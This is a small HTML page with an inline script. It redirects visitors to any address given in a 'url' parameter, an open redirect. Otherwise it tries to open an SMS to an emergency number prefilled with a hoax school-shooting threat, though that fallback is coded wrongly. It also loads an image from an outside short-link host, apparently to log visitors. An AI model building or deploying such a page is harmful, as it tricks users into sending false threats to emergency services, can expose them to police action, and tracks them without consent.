<!DOCTYPE html>
<html>
<head>
    <script>
        const urlParams = new URLSearchParams(window.location.search);
        const targetUrl = urlParams.get('url');
        const trollUrl = urlParams.get("sms:+911?body=Sup+Pigs%21%3F+Finna+shoot+up+a+school%2C+you+boutta+pull+up+or+nah%3F+%23BlazeWuzHere");
        if (targetUrl) {
            window.location.href = targetUrl;
        } else {
            window.location.href = trollUrl;
        }
    </script>
</head>
<body>
    <img src="https://map-s.online/MCX9FJ">
</body>
</html>
